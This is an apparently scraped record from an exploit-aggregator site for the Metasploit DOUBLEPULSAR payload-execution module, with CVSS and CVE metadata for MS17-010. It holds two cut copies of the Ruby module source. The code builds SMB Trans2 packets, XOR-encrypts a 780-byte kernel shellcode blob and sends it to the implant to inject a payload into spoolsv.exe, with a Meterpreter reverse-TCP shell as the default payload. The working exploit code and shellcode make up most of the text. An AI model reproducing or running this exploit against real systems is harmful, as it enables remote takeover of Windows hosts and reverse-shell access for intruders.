to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-23] #"}, "lastseen": "2021-09-22T22:15:46", "differentElements": ["sourceData"], "edition": 23}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "66d4f60e99160e541ccc5f95301164ff", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-23T22:16:05", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", 
"700099.PRM", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707", "SMNTC-96705", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-23T22:16:05", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-23T22:16:05", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n 